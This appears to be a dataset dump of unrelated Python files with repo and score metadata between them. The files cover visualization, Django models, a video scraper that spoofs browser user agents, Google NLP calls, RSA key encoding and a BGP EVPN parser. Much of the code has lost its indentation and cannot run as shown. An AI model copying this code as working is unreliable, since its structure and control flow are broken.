def setVizType(self, type): self._vizType = type
def vizType(self): return self._vizType
def setRange(self, range): self._range = range
def offsetLimits(self):
if self._dims == 2: return []
if self._dims == 3: return [self._data.shape[self._offsetAxes[0]]-1]
if self._dims == 4: return [self._data.shape[self._offsetAxes[0]]-1, self._data.shape[self._offsetAxes[1]]-1]
return []
def setAxes(self, axes):
self._plotAxes = axes[0:2]
self._offsetAxes = axes[2:]
while len(self._offsetAxes) < 2:
self._offsetAxes.append(len(self._offsetAxes)+2)
# print(self._plotAxes, self._offsetAxes)
def setOffset(self, offset):
if self._dims <= 2:
return
if isinstance(offset, int):
offset = [offset, 0]
self._offset = list(copy(offset))
while(len(self._offset) < 2):
self._offset.append(0)
# print('offsets set', self._offset)
def minValue(self):
if self._data is not None:
m = np.min(self._data[np.logical_not(np.isnan(self._data))])
return float(m)
else: return 0
def maxValue(self):
if self._data is not None:
m = np.max(self._data[np.logical_not(np.isnan(self._data))])
return float(m)
else: return 0
def selectedData(self):
# print('selectedData', self._data.shape, self._offsetAxes, self._plotAxes)
transposed = np.transpose(self._data, self._offsetAxes + self._plotAxes)
return transposed[self._offset[0], self._offset[1], :, :]
def selectedData3(self):
transposed = np.transpose(self._data, self._offsetAxes + self._plotAxes)
return np.transpose(transposed[self._offset[0]:self._offset[0]+3, self._offset[1], :, :], [1, 2, 0])
def scaledSelectedData(self):
transformed = (self._data - float(self._range[0])) / (float(self._range[1]) - float(self._range[0]))
transposed = np.transpose(transformed, self._offsetAxes + self._plotAxes)
        return transposed[self._offset[0], self._offset[1], :, :]
def minCurrentOffsetValue(self):
if self._data is not None:
data = self.selectedData()
m = np.min(data[np.logical_not(np.isnan(data))])
return float(m)
else: return 0
def maxCurrentOffsetValue(self):
if self._data is not None:
data = self.selectedData()
m = np.max(data[np.logical_not(np.isnan(data))])
return float(m)
else: return 0
def data(self):
return self._data
def image(self):
if self._data is None: return None
if self._vizType == 'grayscale':
data = self.selectedData()
# print('selected shape', data.shape)
transformed = (data - float(self._range[0])) / (float(self._range[1]) - float(self._range[0]))
transformed[transformed>1] = 1
transformed[transformed<0] = 0
return (transformed[:, :]*255.0).astype(np.uint8)
elif self._vizType == 'rgb':
data = self.selectedData3()
# print('selected shape', data.shape)
transformed = (data - float(self._range[0])) / (float(self._range[1]) - float(self._range[0]))
transformed[transformed>1] = 1
transformed[transformed<0] = 0
return (transformed[:, :, :]*255.0).astype(np.uint8)
elif self._vizType == 'heatmap':
data = self.selectedData()
# print('selected shape', data.shape)
heatmap = heat_map_viz(data, self._range[0], self._range[1])
return heatmap.astype(np.uint8)
elif self._vizType == 'label':
data = self.selectedData()
# print('selected shape', data.shape)
return labelViz(data[:, :], self._range[0], self._range[1])
else:
raise Exception('invalid viztype')
def pixmap(self):
return toQPixmap(self.image())
| 2.4375 | 2 |
history/models.py | lievertom/2020.2-Projeto-Kokama-Ensino | 0 | 12795671 | <filename>history/models.py
from django.db import models
class KokamaHistory(models.Model):
history_title = models.CharField(max_length=50)
history_text = models.TextField()
def __str__(self):
return self.history_title
| 2.0625 | 2 |
news/migrations/0006_auto_20201111_0809.py | giantmade/giant-news | 2 | 12795672 | <filename>news/migrations/0006_auto_20201111_0809.py
# Generated by Django 2.2 on 2020-11-11 08:09
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
("news", "0005_relatedarticlecardplugin_relatedarticleplugin"),
]
operations = [
migrations.AddField(
model_name="relatedarticleplugin",
name="category",
field=models.ForeignKey(
blank=True,
help_text="\n Limit recent articles based on a category. This will\n override the tags that you choose and will filter on this category\n ONLY.\n ",
null=True,
on_delete=django.db.models.deletion.SET_NULL,
to="news.Category",
),
),
migrations.AddField(
model_name="relatedarticleplugin",
name="num_articles",
field=models.PositiveIntegerField(
default=3,
help_text="\n This will decide how many articles to return. By\n default this plugin will return this number articles\n based on when they were created. You can filter the\n articles more using the fields below\n ",
),
),
migrations.AlterField(
model_name="relatedarticleplugin",
name="tags",
field=models.ManyToManyField(
blank=True,
help_text="\n Limit recent articles based on tags. This is the \n first priority in what articles are returned and will be overriden\n if you also select a category.\n ",
to="news.ArticleTag",
),
),
]
| 1.992188 | 2 |
working/website/make_news_posts.py | flatironinstitute/spikeforest_old | 1 | 12795673 | <reponame>flatironinstitute/spikeforest_old<gh_stars>1-10
#!/usr/bin/env python
import os
import shutil
import json
import frontmatter
def main():
if os.path.exists('news_posts'):
shutil.rmtree('news_posts')
os.mkdir('news_posts')
newspath = '../../docs/news'
news_posts = []
for fname in os.listdir(newspath):
if fname.endswith('.md'):
fm = frontmatter.load(newspath + '/' + fname).to_dict()
news_posts.append(dict(
title=fm['title'],
date=fm['date'].isoformat(),
author=fm['author'],
markdown=fm['content']
))
out_fname = 'news_posts/NewsPosts.json'
print('Writing to {}'.format(out_fname))
with open(out_fname, 'w') as f:
json.dump(news_posts, f)
print('Done.')
if __name__ == "__main__":
main()
| 2.40625 | 2 |
app/spider_store/extractors/ku6.py | lihaoABC/trans_api | 0 | 12795674 | <reponame>lihaoABC/trans_api
# _*_ coding: UTF-8 _*_
import logging
import random
import re
import urllib.parse
from app.spider_store.common import (
match1,
get_content,
)
from app.spider_store.configs import FAKE_USER_AGENT
headers = {
'user-agent': random.choice(FAKE_USER_AGENT)
}
def baomihua_download_by_id(_id, title, source, img_url, type):
html = get_content(
'http://play.baomihua.com/getvideourl.aspx?flvid={}&devicetype='
'phone_app'.format(_id)
)
host = match1(html, r'host=([^&]*)')
_type = match1(html, r'videofiletype=([^&]*)')
vid = match1(html, r'&stream_name=([^&]*)')
dir_str = match1(html, r'&dir=([^&]*)').strip()
video_url = 'http://{}/{}/{}.{}'.format(host, dir_str, vid, _type)
logging.debug("url is {}".format(video_url))
if title is None:
title = match1(html, r'&title=([^&]*)')
title = urllib.parse.unquote(title)
if source is None:
return None
if img_url is None:
img_url = match1(html, r'&video_img=([^&]*)')
ext = _type
size = int(match1(html, r'&videofilesize=([^&]*)'))
size = float("{:.2f}".format(int(size) / 1024 / 1024))
data = {
"type": type,
"title": title,
"source": source,
"thumbnail_urls": [img_url],
"image_urls": None,
"video_url": [video_url],
"ext": ext,
"size": size,
}
return data
def ku6_download(url):
html = get_content(url)
type = news_type(url)
title = match1(html, r"\$\(['\"]#video-title['\"]\)\.text\(['\"]([\s\S\w\W]+?)['\"]\);")
if title is None:
title = match1(html, r"document\.title\s*=\s*['\"]([\s\S\w\W]+?)['\"];")
title = title.strip()
source = match1(html, r"\$\(['\"]#video-author['\"]\)\.text\(['\"](.*?)['\"]\);")
img_url = match1(html, r'[\'|"]poster[\'|"]:\s*[\'|"](.*?)[\'|"],\s*[\'|"]controls[\'|"]:')
video_url = match1(html, r'this\.src\(\{type:\s*[\'|"]video/mp4[\'|"], src: [\'|"](.*?)[\'|"]}\);')
data = {
"type": type,
"title": title,
"source": source,
"thumbnail_urls": [img_url],
"image_urls": None,
"video_url": [video_url],
"ext": None,
"size": None,
}
return data
def news_type(url):
# https://www.ku6.com/video/detail?id=4Oqd5_XQsCDtJU7HMjHRD4nrgAg.
if re.search(r"http[s]?://www\.ku6\.com/video/detail\?id=.*?$", url):
return "video"
download = ku6_download
if __name__ == '__main__':
url = "https://www.ku6.com/video/detail?id=gRJ4Q0LnmBx7IzxAI019mjiDMMA."
data = download(url)
print(data) | 2.15625 | 2 |
main.py | omarzanji/nlp-search | 0 | 12795675 | """
Given a substring, search an array of strings by cosine similarity (linear kernel),
returning the index with the highest kernel output (confidence).
"""
class NLPSearch:
def __init__(self):
pass
def process_data(self):
pass
def create_model(self):
pass
def train_model(self):
pass
def prompt(self, prompt):
pass
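# Hedged sketch (not part of the original stubs): one way to realize the search the
# module docstring describes, using scikit-learn's TfidfVectorizer and linear_kernel.
# The function name and the corpus/query arguments are illustrative assumptions.
def sketch_search(query, corpus):
    from sklearn.feature_extraction.text import TfidfVectorizer
    from sklearn.metrics.pairwise import linear_kernel
    vectorizer = TfidfVectorizer()
    doc_matrix = vectorizer.fit_transform(corpus)                 # one row per string in the array
    scores = linear_kernel(vectorizer.transform([query]), doc_matrix)[0]
    return int(scores.argmax())                                   # index with the highest kernel output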
if __name__ == "__main__":
search = NLPSearch() | 3.171875 | 3 |
google API/NL.py | nfrumkin/ElMingle | 1 | 12795676 | # Imports the Google Cloud client library
from google.cloud import language
from google.cloud.language import enums
from google.cloud.language import types
# Instantiates a client
client = language.LanguageServiceClient()
ENTITY_TYPE_TO_IGNORE = [8, 9, 10, 11, 12]
# The text to analyze
text = "Aside from course work, my passion for traveling was what prompted me to take part in the study aboard program in Dresden, Germany, in the spring of 2018 and Tokyo, Japan in the summer of 2017. While taking classes offered at both TU Dresden and Tokyo tech, I spent most of my off time traveling Europe and around the city. Combine with my study in the States, I believe that it is these experiences that taught me how to quickly adapt to changes in the environment and apply my ability in a different context. My passion for electronics and computers is also what prompts me to join the High-Performance Computing (HPC) club and continue to be an active member of the university maker space. My decision to take part in the leadership role of the BUHPC contained more than my interest in the subject matter; I wish to inspire others learning about HPC by sharing a subject that I enjoy learning. Similarly, by taking part in the engineering "
def gapiAnalysisText(text):
document = types.Document(
content=text,
type=enums.Document.Type.PLAIN_TEXT)
encoding_type = enums.EncodingType.UTF8
response = client.analyze_entities(document, encoding_type=encoding_type)
    # Loop through entities returned from the API
    key_words = list()
    for entity in response.entities:
        if entity.type not in ENTITY_TYPE_TO_IGNORE:
            key_words.append(entity.name)
    key_words = list(dict.fromkeys(key_words))
    key_words.sort()
    return ",".join(map(str, key_words))
char_str = gapiAnalysisText(text)
print(char_str)
| 2.921875 | 3 |
causal_world/metrics/__init__.py | michaelfeil/CausalWorld | 2 | 12795677 | from causal_world.metrics.metric_base import BaseMetric
from causal_world.metrics.mean_accumulated_reward_metric import \
MeanAccumulatedRewardMetric
from causal_world.metrics.mean_full_integrated_fractional_success \
import MeanFullIntegratedFractionalSuccess
from causal_world.metrics.mean_last_fractional_success import \
MeanLastFractionalSuccess
from causal_world.metrics.mean_last_integrated_fractional_success import \
MeanLastIntegratedFractionalSuccess
| 1.125 | 1 |
src/utils/key_generator.py | oswagner/rsa-implementation | 0 | 12795678 | <reponame>oswagner/rsa-implementation
from base64 import b64decode
from pyasn1.codec.der.encoder import encode
from pyasn1.codec.der.decoder import decode
from utils.private_key import AsnSchemaPrivateKey
from utils.public_key import AsnSchemaPublicKey
#
# Used as a reference for creating and formatting the keys
# https://github.com/sybrenstuvel/python-rsa
#
#
# Supporting library for the key structures
# https://github.com/etingof/pyasn1
#
def generate_public_key(e, modulus):
asn_key = AsnSchemaPublicKey()
asn_key.setComponentByName('modulus', modulus)
asn_key.setComponentByName('publicExponent', e)
return encode(asn_key)
def generate_private_key(e, n, d, p, q, exp1, exp2, coef):
# Create the ASN object
asn_key = AsnSchemaPrivateKey()
asn_key.setComponentByName('version', 0)
asn_key.setComponentByName('modulus', n)
asn_key.setComponentByName('publicExponent', e)
asn_key.setComponentByName('privateExponent', d)
asn_key.setComponentByName('prime1', p)
asn_key.setComponentByName('prime2', q)
asn_key.setComponentByName('exponent1', exp1)
asn_key.setComponentByName('exponent2', exp2)
asn_key.setComponentByName('coefficient', coef)
return encode(asn_key)
def decode_public_key(public_key_encoded):
# Undo BASE64 serialisation
der_serialisation = b64decode(public_key_encoded)
# Undo DER serialisation, reconstruct SSH key structure
public_key, rest_of_input = decode(
der_serialisation, asn1Spec=AsnSchemaPublicKey())
return public_key
def decode_private_key(private_key_encoded):
# Undo BASE64 serialisation
der_serialisation = b64decode(private_key_encoded)
# Undo DER serialisation, reconstruct SSH key structure
private_key, rest_of_input = decode(
der_serialisation, asn1Spec=AsnSchemaPrivateKey())
return private_key
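# Illustrative round trip (values are assumptions, not from the original repo): the DER bytes
# returned by generate_public_key(65537, n) can be base64-encoded with base64.b64encode and
# then recovered via decode_public_key, which expects exactly that base64 form (it begins by
# calling b64decode).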
| 2.609375 | 3 |
tests/test_models.py | lydiah2015/news-highlight | 0 | 12795679 | <filename>tests/test_models.py
from app.models import Article, Source
import unittest
from unittest import TestCase
class TestSource(TestCase):
def setUp(self):
self.source=Source("BuzzFeed","BuzzFeed is a cross-platform")
def test_instance(self):
self.assertIsInstance(self.source,Source)
def test_create(self):
self.assertEqual(self.source.name,"BuzzFeed")
self.assertEqual(self.source.description,
"BuzzFeed is a cross-platform"
)
class TestArticle(TestCase):
def setUp(self):
self.article=Article(
"title","urlToImage","description","url","author"
)
def test_instance(self):
self.assertIsInstance(self.article,Article)
def test_create(self):
self.assertEqual(self.article.title,"title")
self.assertEqual(self.article.description,
"description"
)
if __name__ == '__main__':
unittest.main() | 3.09375 | 3 |
ch_python/def_tempconv.py | yehnan/rpi_book_yehnan | 3 | 12795680 | #!/usr/bin/env python
def ftoc(f):
return (f - 32) * 5 / 9
def ctof(c):
return c * (9 / 5) + 32
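# Sanity check of the formulas: ftoc(212) == 100.0 and ctof(100) == 212.0 (boiling-point round trip).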
print("Celsius degree 55 is equal to Fahrenheit degree " + str(ctof(55)));
print("Fahrenheit degree 55 is equal to Celsius degree " + str(ftoc(55)));
| 3.890625 | 4 |
tests/conftest.py | idlesign/opencv-proto | 18 | 12795681 | <gh_stars>10-100
import pytest
from pathlib import Path
STUB = False
if STUB:
from pytest_stub.toolbox import stub_global
stub_global({
'cv2': '[mock_persist]',
'numpy': '[mock_persist]',
})
@pytest.fixture
def static_path(request):
path = request.fspath
def static_path_(fname):
return Path(str(path)).parent / 'static' / fname
return static_path_
| 2.015625 | 2 |
yabgp/message/attribute/nlri/evpn.py | OpenBGP/openbgp | 0 | 12795682 | <filename>yabgp/message/attribute/nlri/evpn.py
# Copyright 2016 Cisco Systems, Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import division
import struct
import binascii
import netaddr
from yabgp.common import afn
from yabgp.common import safn
from yabgp.common import constants as bgp_cons
from yabgp.message.attribute.nlri import NLRI
from yabgp.message.attribute.nlri.mpls_vpn import MPLSVPN
class EVPN(NLRI):
"""
The format of the EVPN NLRI is as follows:
+-----------------------------------+
| Route Type (1 octet) |
+-----------------------------------+
| Length (1 octet) |
+-----------------------------------+
| Route Type specific (variable) |
+-----------------------------------+
"""
@classmethod
def parse(cls, nlri_data):
nlri_list = []
while nlri_data:
route_type = ord(nlri_data[0:1])
offset = ord(nlri_data[1:2])
route_value = nlri_data[2: offset + 2]
route = {}
if route_type == bgp_cons.BGPNLRI_EVPN_ETHERNET_AUTO_DISCOVERY:
route = EthernetAutoDiscovery.parse(route_value)
elif route_type == bgp_cons.BGPNLRI_EVPN_MAC_IP_ADVERTISEMENT:
route = MacIPAdvertisment.parse(route_value)
elif route_type == bgp_cons.BGPNLRI_EVPN_INCLUSIVE_MULTICAST_ETHERNET_TAG:
route = InclusiveMulticastEthernetTag.parse(route_value)
elif route_type == bgp_cons.BGPNLRI_EVPN_ETHERNET_SEGMENT:
route = EthernetSegment.parse(route_value)
elif route_type == bgp_cons.BGPNLRI_EVPN_IP_ROUTE_PREFIX:
route = IPRoutePrefix.parse(route_value)
if route:
nlri_list.append({
'type': route_type,
'value': route
})
nlri_data = nlri_data[offset + 2:]
return nlri_list
@classmethod
def construct(cls, nlri_list):
nlri_list_hex = b''
for nlri in nlri_list:
nlri_hex = b''
if nlri['type'] == bgp_cons.BGPNLRI_EVPN_ETHERNET_AUTO_DISCOVERY:
nlri_hex = EthernetAutoDiscovery.construct(value=nlri['value'])
elif nlri['type'] == bgp_cons.BGPNLRI_EVPN_MAC_IP_ADVERTISEMENT:
nlri_hex = MacIPAdvertisment.construct(value=nlri['value'])
elif nlri['type'] == bgp_cons.BGPNLRI_EVPN_INCLUSIVE_MULTICAST_ETHERNET_TAG:
nlri_hex = InclusiveMulticastEthernetTag.construct(value=nlri['value'])
elif nlri['type'] == bgp_cons.BGPNLRI_EVPN_ETHERNET_SEGMENT:
nlri_hex = EthernetSegment.construct(value=nlri['value'])
elif nlri['type'] == bgp_cons.BGPNLRI_EVPN_IP_ROUTE_PREFIX:
nlri_hex = IPRoutePrefix.construct(value=nlri['value'])
if nlri_hex:
nlri_list_hex += struct.pack('!2B', nlri['type'], len(nlri_hex)) + nlri_hex
return nlri_list_hex
@staticmethod
def signal_evpn_overlay(attr_dict):
"""
draft-ietf-bess-evpn-overlay-10 changes label encoding if EVPN and encapsulation EC set
:param attr_dict: bgp attribute dictionary
"""
evpn_overlay = {'evpn': False, 'encap_ec': False}
try:
afi_safi = tuple(attr_dict.get(bgp_cons.BGPTYPE_MP_REACH_NLRI).get('afi_safi'))
community_ext = attr_dict.get(bgp_cons.BGPTYPE_EXTENDED_COMMUNITY)
except:
return evpn_overlay
if afi_safi == (afn.AFNUM_L2VPN, safn.SAFNUM_EVPN):
evpn_overlay['evpn'] = True
if community_ext:
for ec in community_ext:
if bgp_cons.BGP_EXT_COM_DICT['encapsulation'] == ec[0]:
evpn_overlay['encap_ec'] = True
evpn_overlay['encap_value'] = int(ec[1])
return evpn_overlay
@classmethod
def parse_rd(cls, data):
"""
For Cisco: The BGP route distinguisher can be derived automatically
from the VNI and BGP router ID of the VTEP switch
:param data:
:return:
"""
rd_type = struct.unpack('!H', data[0:2])[0]
rd_value = data[2:8]
if rd_type == bgp_cons.BGP_ROUTE_DISTINGUISHER_TYPE_0:
asn, an = struct.unpack('!HI', rd_value)
rd = '%s:%s' % (asn, an)
elif rd_type == bgp_cons.BGP_ROUTE_DISTINGUISHER_TYPE_1:
ip = str(netaddr.IPAddress(struct.unpack('!I', rd_value[0:4])[0]))
an = struct.unpack('!H', rd_value[4:6])[0]
rd = '%s:%s' % (ip, an)
elif rd_type == bgp_cons.BGP_ROUTE_DISTINGUISHER_TYPE_2:
asn, an = struct.unpack('!IH', rd_value)
rd = '%s:%s' % (asn, an)
else:
# fixme(by xiaopeng163) for other rd type process
rd = str(rd_value)
return rd
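    # Illustrative packing (values are hypothetical, assuming BGP_ROUTE_DISTINGUISHER_TYPE_0 == 0):
    # a type-0 RD string such as '65000:100' goes through construct_rd as
    #   struct.pack('!HHI', 0, 65000, 100)  ->  b'\x00\x00\xfd\xe8\x00\x00\x00d'
    # and parse_rd turns those 8 octets back into '65000:100'.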
@classmethod
def construct_rd(cls, data):
# fixme(by xiaopeng163) for other rd type process
data = data.split(':')
if '.' in data[0]:
return struct.pack('!H', bgp_cons.BGP_ROUTE_DISTINGUISHER_TYPE_1) + netaddr.IPAddress(data[0]).packed + \
struct.pack('!H', int(data[1]))
else:
data = [int(x) for x in data]
if data[0] <= 0xffff:
return struct.pack('!HHI', bgp_cons.BGP_ROUTE_DISTINGUISHER_TYPE_0, data[0], data[1])
else:
return struct.pack('!HIH', bgp_cons.BGP_ROUTE_DISTINGUISHER_TYPE_2, data[0], data[1])
@classmethod
def parse_esi(cls, esi):
"""
The ESI has the following format:
+---+---+---+---+---+---+---+---+---+---+
| T | ESI Value |
+---+---+---+---+---+---+---+---+---+---+
"""
esi_type, esi_value = struct.unpack("!B", esi[:1])[0], {}
if esi_type == bgp_cons.ESI_BGPNLRI_EVPN_TYPE_0:
esi_value = int.from_bytes(esi[1:], byteorder='big')
elif esi_type == bgp_cons.ESI_BGPNLRI_EVPN_TYPE_1:
esi_value = {
"ce_mac_addr": str(netaddr.EUI(int(binascii.b2a_hex(esi[1:7]), 16))),
"ce_port_key": int.from_bytes(esi[7:9], byteorder='big')
}
elif esi_type == bgp_cons.ESI_BGPNLRI_EVPN_TYPE_2:
esi_value = {
"rb_mac_addr": str(netaddr.EUI(int(binascii.b2a_hex(esi[1:7]), 16))),
"rb_priority": int.from_bytes(esi[7:9], byteorder='big')
}
elif esi_type == bgp_cons.ESI_BGPNLRI_EVPN_TYPE_3:
esi_value = {
"sys_mac_addr": str(netaddr.EUI(int(binascii.b2a_hex(esi[1:7]), 16))),
"ld_value": int.from_bytes(esi[7:], byteorder='big')
}
elif esi_type == bgp_cons.ESI_BGPNLRI_EVPN_TYPE_4:
esi_value = {
"router_id": int.from_bytes(esi[1:5], byteorder='big'),
"ld_value": int.from_bytes(esi[5:9], byteorder='big')
}
elif esi_type == bgp_cons.ESI_BGPNLRI_EVPN_TYPE_5:
esi_value = {
"as_num": int.from_bytes(esi[1:5], byteorder='big'),
"ld_value": int.from_bytes(esi[5:9], byteorder='big')
}
return {"type": esi_type, "value": esi_value}
@classmethod
def construct_esi(cls, esi_data):
esi_type, esi_value = esi_data["type"], esi_data["value"]
esi_data_hex = b''
if esi_type == bgp_cons.ESI_BGPNLRI_EVPN_TYPE_0:
esi_bytes = esi_value.to_bytes(9, byteorder='big')
esi_data_hex = b'\x00' + esi_bytes
elif esi_type == bgp_cons.ESI_BGPNLRI_EVPN_TYPE_1:
ce_mac_addr, ce_port_key = esi_value["ce_mac_addr"], esi_value["ce_port_key"]
ce_mac_hex = b''.join([struct.pack('!B', (int(i, 16))) for i in ce_mac_addr.split("-")])
ce_port_hex = ce_port_key.to_bytes(2, byteorder='big')
esi_data_hex = b'\x01' + ce_mac_hex + ce_port_hex + b'\x00'
elif esi_type == bgp_cons.ESI_BGPNLRI_EVPN_TYPE_2:
rb_mac_addr, rb_priority = esi_value["rb_mac_addr"], esi_value["rb_priority"]
rb_mac_hex = b''.join([struct.pack('!B', (int(i, 16))) for i in rb_mac_addr.split("-")])
rb_priority_hex = rb_priority.to_bytes(2, byteorder='big')
esi_data_hex = b'\x02' + rb_mac_hex + rb_priority_hex + b'\x00'
elif esi_type == bgp_cons.ESI_BGPNLRI_EVPN_TYPE_3:
sys_mac_addr, ld_value = esi_value["sys_mac_addr"], esi_value["ld_value"]
sys_mac_hex = b''.join([struct.pack('!B', (int(i, 16))) for i in sys_mac_addr.split("-")])
ld_value_hex = ld_value.to_bytes(3, byteorder='big')
esi_data_hex = b'\x03' + sys_mac_hex + ld_value_hex
elif esi_type == bgp_cons.ESI_BGPNLRI_EVPN_TYPE_4:
router_id, ld_value = esi_value["router_id"], esi_value["ld_value"]
router_id_hex = router_id.to_bytes(4, byteorder='big')
ld_value_hex = ld_value.to_bytes(4, byteorder='big')
esi_data_hex = b'\x04' + router_id_hex + ld_value_hex + b'\x00'
elif esi_type == bgp_cons.ESI_BGPNLRI_EVPN_TYPE_5:
as_num, ld_value = esi_value["as_num"], esi_value["ld_value"]
as_num_hex = as_num.to_bytes(4, byteorder='big')
ld_value_hex = ld_value.to_bytes(4, byteorder='big')
esi_data_hex = b'\x05' + as_num_hex + ld_value_hex + b'\x00'
return esi_data_hex
class EthernetAutoDiscovery(EVPN):
"""
+---------------------------------------+
| Route Distinguisher (RD) (8 octets) |
+---------------------------------------+
|Ethernet Segment Identifier (10 octets)|
+---------------------------------------+
| Ethernet Tag ID (4 octets) |
+---------------------------------------+
| MPLS Label (3 octets) |
+---------------------------------------+
"""
@classmethod
def parse(cls, value, iswithdraw=False):
route = dict()
route['rd'] = cls.parse_rd(value[0:8])
offset = 8
route['esi'] = cls.parse_esi(value[offset: offset + 10])
offset += 10
# ethernet tag id
route['eth_tag_id'] = struct.unpack('!I', value[offset: offset + 4])[0]
offset += 4
route['label'] = cls.parse_mpls_label_stack(value[offset:])
return route
@classmethod
def construct(cls, value, iswithdraw=False):
# rd
value_hex = b''
value_hex += cls.construct_rd(value['rd'])
# esi
value_hex += b'\x00\x00' + struct.pack('!d', value['esi'])
# ethernet tag
value_hex += struct.pack('!I', value['eth_tag_id'])
value_hex += cls.construct_mpls_label_stack(value['label'])
return value_hex
class MacIPAdvertisment(EVPN):
"""
+---------------------------------------+
| RD (8 octets) |
+---------------------------------------+
|Ethernet Segment Identifier (10 octets)|
+---------------------------------------+
| Ethernet Tag ID (4 octets) |
+---------------------------------------+
| MAC Address Length (1 octet) |
+---------------------------------------+
| MAC Address (6 octets) |
+---------------------------------------+
| IP Address Length (1 octet) |
+---------------------------------------+
| IP Address (0, 4, or 16 octets) |
+---------------------------------------+
| MPLS Label1 (3 octets) |
+---------------------------------------+
| MPLS Label2 (0 or 3 octets) |
+---------------------------------------+
"""
@classmethod
def parse(cls, value, iswithdraw=False):
route = dict()
# rd
offset = 8
route['rd'] = cls.parse_rd(value[0:offset])
# esi
route['esi'] = cls.parse_esi(value[offset: offset + 10])
offset += 10
# ethernet tag id
route['eth_tag_id'] = struct.unpack('!I', value[offset: offset + 4])[0]
offset += 5
# mac address
route['mac'] = str(netaddr.EUI(int(binascii.b2a_hex(value[offset: offset + 6]), 16)))
offset += 6
ip_addr_len = ord(value[offset: offset + 1])
offset += 1
# ip address
if ip_addr_len != 0:
route['ip'] = str(netaddr.IPAddress(
int(binascii.b2a_hex(value[offset: offset + int(ip_addr_len / 8)]), 16)))
offset += int(ip_addr_len / 8)
# label
route['label'] = cls.parse_mpls_label_stack(value[offset:])
return route
@classmethod
def construct(cls, value, iswithdraw=False):
# rd
value_hex = b''
value_hex += cls.construct_rd(value['rd'])
# esi
value_hex += b'\x00\x00' + struct.pack('!d', value['esi'])
# ethernet tag
value_hex += struct.pack('!I', value['eth_tag_id'])
# mac address len and address
mac_hex = b''.join([struct.pack('!B', (int(i, 16))) for i in value['mac'].split("-")])
value_hex += struct.pack('!B', len(mac_hex) * 8) + mac_hex
# ip address len and address
if value.get('ip'):
ip_hex = netaddr.IPAddress(value['ip']).packed
value_hex += struct.pack('!B', len(ip_hex) * 8) + ip_hex
else:
value_hex += b'\x00'
if value.get('label'):
value_hex += cls.construct_mpls_label_stack(value['label'])
return value_hex
class InclusiveMulticastEthernetTag(EVPN):
"""
+---------------------------------------+
| RD (8 octets) |
+---------------------------------------+
| Ethernet Tag ID (4 octets) |
+---------------------------------------+
| IP Address Length (1 octet) |
+---------------------------------------+
| Originating Router's IP Address |
| (4 or 16 octets) |
+---------------------------------------+
"""
@classmethod
def parse(cls, value, iswithdraw=False):
route = dict()
offset = 8
route['rd'] = cls.parse_rd(value[0:offset])
route['eth_tag_id'] = struct.unpack('!I', value[offset: offset + 4])[0]
offset += 4
ip_addr_len = ord(value[offset: offset + 1])
offset += 1
# ip address
if ip_addr_len != 0:
route['ip'] = str(netaddr.IPAddress(int(binascii.b2a_hex(value[offset: int(offset + ip_addr_len / 8)]), 16)))
return route
@classmethod
def construct(cls, value, iswithdraw=False):
# rd
value_hex = b''
value_hex += cls.construct_rd(value['rd'])
value_hex += struct.pack('!I', value['eth_tag_id'])
# ip address len and address
if value.get('ip'):
ip_hex = netaddr.IPAddress(value['ip']).packed
value_hex += struct.pack('!B', len(ip_hex) * 8) + ip_hex
else:
value_hex += b'\x00'
return value_hex
class EthernetSegment(EVPN):
"""
+---------------------------------------+
| RD (8 octets) |
+---------------------------------------+
|Ethernet Segment Identifier (10 octets)|
+---------------------------------------+
| IP Address Length (1 octet) |
+---------------------------------------+
| Originating Router's IP Address |
| (4 or 16 octets) |
+---------------------------------------+
"""
@classmethod
def parse(cls, value, iswithdraw=False):
route = dict()
offset = 8
route['rd'] = cls.parse_rd(value[0:offset])
# esi
route['esi'] = cls.parse_esi(value[offset: offset + 10])
offset += 10
ip_addr_len = ord(value[offset: offset + 1])
offset += 1
# ip address
if ip_addr_len != 0:
route['ip'] = str(netaddr.IPAddress(int(binascii.b2a_hex(value[offset: offset + ip_addr_len // 8]), 16)))
return route
@classmethod
def construct(cls, value, iswithdraw=False):
# rd
value_hex = b''
value_hex += cls.construct_rd(value['rd'])
# esi
value_hex += b'\x00\x00' + struct.pack('!d', value['esi'])
# ip address len and address
if value.get('ip'):
ip_hex = netaddr.IPAddress(value['ip']).packed
value_hex += struct.pack('!B', len(ip_hex) * 8) + ip_hex
else:
value_hex += b'\x00'
return value_hex
class IPRoutePrefix(EVPN):
"""
# http://tools.ietf.org/html/draft-ietf-bess-evpn-prefix-advertisement-01
+---------------------------------------+
| RD (8 octets) |
+---------------------------------------+
|Ethernet Segment Identifier (10 octets)|
+---------------------------------------+
| Ethernet Tag ID (4 octets) |
+---------------------------------------+
| IP Prefix Length (1 octet) |
+---------------------------------------+
| IP Prefix (4 or 16 octets) |
+---------------------------------------+
| GW IP Address (4 or 16 octets) |
+---------------------------------------+
| MPLS Label (3 octets) |
+---------------------------------------+
"""
@classmethod
def parse(cls, value, iswithdraw=False):
route = dict()
offset = 8
route['rd'] = cls.parse_rd(value[0:offset])
# esi
route['esi'] = cls.parse_esi(value[offset: offset + 10])
offset += 10
route['eth_tag_id'] = struct.unpack('!I', value[offset: offset + 4])[0]
offset += 4
ip_addr_len = ord(value[offset: offset + 1])
offset += 1
value = value[offset:]
# The IP Prefix Length can be set to a value between 0 and 32
# (bits) for ipv4 and between 0 and 128 for ipv6.
# The IP Prefix will be a 32 or 128-bit field (ipv4 or ipv6).
# # ip address
if len(value) == 11:
# ipv4
offset = 4
elif len(value) == 35:
# ipv6
offset = 16
route['prefix'] = '%s/%s' % (str(netaddr.IPAddress(int(binascii.b2a_hex(value[0: offset]), 16))), ip_addr_len)
value = value[offset:]
route['gateway'] = str(netaddr.IPAddress(int(binascii.b2a_hex(value[0: offset]), 16)))
value = value[offset:]
route['label'] = cls.parse_mpls_label_stack(value)
return route
@classmethod
def construct(cls, value, iswithdraw=False):
value_hex = b''
value_hex += cls.construct_rd(value['rd'])
value_hex += b'\x00\x00' + struct.pack('!d', value['esi'])
value_hex += struct.pack('!I', value['eth_tag_id'])
value_hex += struct.pack('!B', int(value['prefix'].split('/')[1]))
value_hex += netaddr.IPAddress(value['prefix'].split('/')[0]).packed
value_hex += netaddr.IPAddress(value['gateway']).packed
